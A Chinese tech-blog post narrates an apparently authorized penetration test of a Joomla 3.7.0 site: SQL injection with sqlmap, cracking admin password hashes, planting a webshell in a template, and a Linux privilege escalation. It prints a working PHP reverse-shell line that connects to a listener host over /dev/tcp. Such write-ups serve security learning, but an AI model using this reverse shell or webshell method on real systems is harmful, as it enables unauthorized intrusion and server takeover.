编程开源技术交流,分享技术与知识

网站首页 > 开源技术 正文

记一次对 Joomla CMS 渗透过程

wxchong 2024-06-17 22:27:24 开源技术 11 ℃ 0 评论

?最近在一次对某外企进行渗透测试的过程中(已授权)成功突破内网,发现了一个Joomla CMS,想着把这个渗透过程和思路写下来,供大家参考,请大佬略过。。。


首先,对其进行扫描

发现其版本为 Joomla 3.7.0

于是,搜索这个版本的漏洞,,,

发现存在SQL注入漏洞,继续查看详情

上sqlmap跑一波,成功爆库。。。

接下来,爆表

爆用户名密码

在线跑了一下MD5,实在是跑不出来,接下来试试John破解

成功破解,得到密码,登录后台,进入模板写入一句话,访问:

http://10.1.1.104/templates/protostar/shell.php

没有问题,菜刀连接

查看权限,发现不是root

接下来进行提权,首先我们查看系统版本,发现是Linux 4.4.0,查找一个这个版本的漏洞试了好几个都不行,发现这个可以

好,我们上传exp

提权、、、、菜刀不好用,写一个反弹PHP文件,反弹回来一个shell

<?php
system("bash -c 'bash -i >& /dev/tcp/10.1.1.103/7777 0>&1'");
?>


本地监听7777 然后访问:

http://10.1.1.104/templates/protostar/cmd.php

成功反弹shell

接着继续提权、、、运行如下两个文件

./compile.sh
./doubleput

OK,提权成功。。。

Tags:

本文暂时没有评论,来添加一个吧(●'◡'●)

欢迎 发表评论:

最近发表
标签列表